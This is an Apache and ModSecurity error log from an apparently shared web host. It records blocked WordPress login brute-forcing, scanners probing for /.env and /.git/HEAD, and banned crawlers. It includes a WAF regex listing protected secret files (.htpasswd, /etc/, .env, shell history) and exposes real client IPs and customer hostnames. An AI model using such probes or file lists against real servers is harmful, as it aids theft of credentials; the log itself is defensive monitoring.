[Tue May 26 18:23:13.131367 2026] [security2:error] [pid 983082:tid 983228] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXt7vhpIlZJOtze4tTrQAAAJU"]
[Tue May 26 18:23:13.871029 2026] [security2:error] [pid 983082:tid 983314] [client 91.169.4.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXuLvhpIlZJOtze4tTuQAAAOs"]
[Tue May 26 18:23:14.755904 2026] [security2:error] [pid 983082:tid 983233] [client 80.90.183.221:40679] ModSecurity: Access denied with code 406 (phase 1). RBL lookup of 221.183.90.80.csi.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1548"] [id "900927"] [msg "contact-form RBL block: csi.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXurvhpIlZJOtze4tT6AAAAJo"]
[Tue May 26 18:23:15.020138 2026] [security2:error] [pid 983082:tid 983233] [client 80.90.183.221:40679] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "moes-art.com"] [uri "/wp-comments-post.php"] [unique_id "ahWXurvhpIlZJOtze4tT6AAAAJo"]
[Tue May 26 18:23:15.370003 2026] [security2:error] [pid 983082:tid 983259] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXurvhpIlZJOtze4tT2gAAALQ"]
[Tue May 26 18:23:15.884021 2026] [core:error] [pid 983082:tid 983231] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:15.884041 2026] [core:error] [pid 983082:tid 983231] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:19.268363 2026] [security2:error] [pid 983082:tid 983335] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXvbvhpIlZJOtze4tUHAAAAQA"]
[Tue May 26 18:23:20.248192 2026] [security2:error] [pid 983082:tid 983270] [client 176.65.139.231:28200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.worldwidecourier.co.in"] [uri "/.env"] [unique_id "ahWXwLvhpIlZJOtze4tUTwAAAL8"]
[Tue May 26 18:23:20.830663 2026] [security2:error] [pid 983082:tid 983333] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXv7vhpIlZJOtze4tUQAAAAP4"]
[Tue May 26 18:23:22.214651 2026] [core:error] [pid 983082:tid 983306] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:22.214679 2026] [core:error] [pid 983082:tid 983306] [client 5.255.99.53:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:22.498085 2026] [security2:error] [pid 983082:tid 983305] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXwbvhpIlZJOtze4tUXgAAAOI"]
[Tue May 26 18:23:24.303645 2026] [core:error] [pid 983082:tid 983222] [client 5.255.99.53:34556] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:24.303683 2026] [core:error] [pid 983082:tid 983222] [client 5.255.99.53:34556] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:24.630658 2026] [security2:error] [pid 983082:tid 983139] [remote 91.134.89.60:44940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWXxLvhpIlZJOtze4tUpQAAyjg"]
[Tue May 26 18:23:27.082320 2026] [security2:error] [pid 983082:tid 983159] [remote 44.242.10.134:49896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXxrvhpIlZJOtze4tU2QAA9Ew"]
[Tue May 26 18:23:27.184293 2026] [security2:error] [pid 983082:tid 983258] [client 14.230.245.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXxbvhpIlZJOtze4tUwwAAALM"]
[Tue May 26 18:23:27.727519 2026] [security2:error] [pid 983082:tid 983197] [remote 44.242.10.134:49896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.10.242.44.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXx7vhpIlZJOtze4tU5AAApHI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:23:28.158938 2026] [security2:error] [pid 983082:tid 983254] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXxrvhpIlZJOtze4tU1AAAAK8"]
[Tue May 26 18:23:29.755427 2026] [security2:error] [pid 983082:tid 983196] [remote 103.95.119.103:50352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWXybvhpIlZJOtze4tVCAAAwHE"]
[Tue May 26 18:23:31.414268 2026] [security2:error] [pid 983082:tid 983317] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXybvhpIlZJOtze4tVFAAAAO4"]
[Tue May 26 18:23:33.289832 2026] [security2:error] [pid 983082:tid 983327] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXy7vhpIlZJOtze4tVPQAAAPg"]
[Tue May 26 18:23:34.056730 2026] [security2:error] [pid 983082:tid 983326] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXzLvhpIlZJOtze4tVTQAAAPc"]
[Tue May 26 18:23:36.072320 2026] [core:error] [pid 983082:tid 983287] [client 5.255.99.53:34160] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:36.072352 2026] [core:error] [pid 983082:tid 983287] [client 5.255.99.53:34160] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:37.866530 2026] [security2:error] [pid 983082:tid 983277] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX0LvhpIlZJOtze4tVpwAAAMY"]
[Tue May 26 18:23:39.672192 2026] [core:error] [pid 983082:tid 983226] [client 5.255.99.53:34170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:39.672212 2026] [core:error] [pid 983082:tid 983226] [client 5.255.99.53:34170] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:40.397452 2026] [security2:error] [pid 983082:tid 983338] [client 138.199.60.183:56847] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWX07vhpIlZJOtze4tV7AAAAQM"], referer: https://perrettecarpetcleaning.com/s/cdn/?cagmedya.com
[Tue May 26 18:23:41.537616 2026] [security2:error] [pid 983082:tid 983248] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX07vhpIlZJOtze4tV7wAAAKk"]
[Tue May 26 18:23:43.406153 2026] [core:error] [pid 983082:tid 983214] [client 5.255.99.53:34172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:43.406180 2026] [core:error] [pid 983082:tid 983214] [client 5.255.99.53:34172] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:43.816897 2026] [security2:error] [pid 983082:tid 983157] [remote 74.91.224.220:44640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahWX17vhpIlZJOtze4tWLwAA8Eo"]
[Tue May 26 18:23:43.959087 2026] [security2:error] [pid 983082:tid 983335] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX1rvhpIlZJOtze4tWHQAAAQA"]
[Tue May 26 18:23:44.001466 2026] [core:error] [pid 983082:tid 983212] [client 74.7.244.33:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:44.001490 2026] [core:error] [pid 983082:tid 983212] [client 74.7.244.33:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:44.001648 2026] [security2:error] [pid 983082:tid 983212] [client 74.7.244.33:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.drunktales.moes-art.com"] [uri "/index.php"] [unique_id "ahWX17vhpIlZJOtze4tWOQAAAIU"]
[Tue May 26 18:23:44.002182 2026] [security2:error] [pid 983082:tid 983213] [client 74.7.244.33:47300] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.drunktales.moes-art.com"] [uri "/robots.txt"] [unique_id "ahWX17vhpIlZJOtze4tWNwAAhlw"]
[Tue May 26 18:23:45.257580 2026] [core:error] [pid 983082:tid 983313] [client 5.255.99.53:34188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:45.257609 2026] [core:error] [pid 983082:tid 983313] [client 5.255.99.53:34188] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:46.148520 2026] [security2:error] [pid 983082:tid 983312] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX2bvhpIlZJOtze4tWUQAAAOk"]
[Tue May 26 18:23:48.541186 2026] [security2:error] [pid 983082:tid 983275] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX27vhpIlZJOtze4tWfgAAAMQ"]
[Tue May 26 18:23:49.623740 2026] [security2:error] [pid 983082:tid 983198] [remote 74.7.241.58:40998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWX3bvhpIlZJOtze4tWpQAA1XM"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 18:23:49.676119 2026] [security2:error] [pid 983082:tid 983260] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX3LvhpIlZJOtze4tWkgAAALU"]
[Tue May 26 18:23:51.415107 2026] [security2:error] [pid 983082:tid 983274] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX3rvhpIlZJOtze4tWsgAAAMM"]
[Tue May 26 18:23:51.631717 2026] [autoindex:error] [pid 983082:tid 983217] [client 45.148.10.204:42092] AH01276: Cannot serve directory /home2/ucdccoin/omr.ucdc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:23:51.881839 2026] [security2:error] [pid 983082:tid 983289] [client 173.239.240.39:56681] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWX37vhpIlZJOtze4tW0AAAANI"]
[Tue May 26 18:23:51.951931 2026] [security2:error] [pid 983082:tid 983283] [client 173.239.240.52:38863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 52.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWX37vhpIlZJOtze4tW0gAAAMw"]
[Tue May 26 18:23:51.984341 2026] [security2:error] [pid 983082:tid 983233] [client 173.239.240.57:21117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWX37vhpIlZJOtze4tW0wAAAJo"]
[Tue May 26 18:23:52.886410 2026] [core:error] [pid 983082:tid 983239] [client 5.255.99.53:49412] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:52.886432 2026] [core:error] [pid 983082:tid 983239] [client 5.255.99.53:49412] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:23:53.703843 2026] [security2:error] [pid 983082:tid 983307] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX4LvhpIlZJOtze4tW8AAAAOQ"]
403 (Forbidden): 403 Forbidden
Executing in an invalid environment for the supplied user at /usr/local/cpanel/Cpanel/CGI/NoForm.pm line 157.
[Tue May 26 18:23:55.970098 2026] [security2:error] [pid 983082:tid 983286] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX4rvhpIlZJOtze4tXJQAAAM8"]
[Tue May 26 18:23:58.732131 2026] [security2:error] [pid 983082:tid 983299] [client 14.185.129.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX5bvhpIlZJOtze4tXWQAAANw"]
[Tue May 26 18:23:58.745790 2026] [security2:error] [pid 983082:tid 983225] [client 185.191.171.4:44620] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/list/"] [unique_id "ahWX5rvhpIlZJOtze4tXfQAAAJI"]
[Tue May 26 18:23:58.745901 2026] [security2:error] [pid 983082:tid 983225] [client 185.191.171.4:44620] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/list/"] [unique_id "ahWX5rvhpIlZJOtze4tXfQAAAJI"]
[Tue May 26 18:23:59.108784 2026] [security2:error] [pid 983082:tid 983213] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX5bvhpIlZJOtze4tXYAAAAIY"]
[Tue May 26 18:24:00.248200 2026] [core:error] [pid 983082:tid 983244] [client 5.255.99.53:40916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:00.248218 2026] [core:error] [pid 983082:tid 983244] [client 5.255.99.53:40916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:00.918865 2026] [security2:error] [pid 983082:tid 983214] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX57vhpIlZJOtze4tXjQAAAIc"]
[Tue May 26 18:24:01.688575 2026] [core:error] [pid 983082:tid 983299] [client 5.255.99.53:40932] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:01.688598 2026] [core:error] [pid 983082:tid 983299] [client 5.255.99.53:40932] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:01.829448 2026] [security2:error] [pid 983082:tid 983108] [remote 13.42.154.237:46638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.154.42.13.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWX6bvhpIlZJOtze4tXwAAA8xk"]
[Tue May 26 18:24:03.199597 2026] [security2:error] [pid 983082:tid 983284] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX6rvhpIlZJOtze4tXzAAAAM0"]
[Tue May 26 18:24:06.815385 2026] [security2:error] [pid 983082:tid 983232] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX7bvhpIlZJOtze4tYggAAAJk"]
[Tue May 26 18:24:07.192802 2026] [core:error] [pid 983082:tid 983275] [client 5.255.99.53:45348] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:07.192821 2026] [core:error] [pid 983082:tid 983275] [client 5.255.99.53:45348] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 18:24:08.791577 2026] [security2:error] [pid 983082:tid 983253] [client 47.128.47.124:35278] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/fr/news"] [unique_id "ahWX8LvhpIlZJOtze4tY8gAAAK4"]
[Tue May 26 18:24:09.098264 2026] [security2:error] [pid 983082:tid 983299] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX77vhpIlZJOtze4tY1AAAANw"]
[Tue May 26 18:24:10.138796 2026] [security2:error] [pid 983082:tid 983123] [remote 217.174.148.171:35266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 171.148.174.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWX8bvhpIlZJOtze4tZCAAAjyg"]
[Tue May 26 18:24:11.074408 2026] [security2:error] [pid 983082:tid 983089] [remote 46.20.146.46:33882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 46.146.20.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWX8rvhpIlZJOtze4tZGQAA5gY"]
[Tue May 26 18:24:11.454219 2026] [security2:error] [pid 983082:tid 983258] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWX8rvhpIlZJOtze4tZDwAAALM"]
[Tue May 26 18:24:11.462790 2026] [security2:error] [pid 983082:tid 983316] [client 98.159.226.56:53347] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "www.consultrgb.moes-art.com"] [uri "/.git/HEAD"] [unique_id "ahWX87vhpIlZJOtze4tZKgAAAO0"]
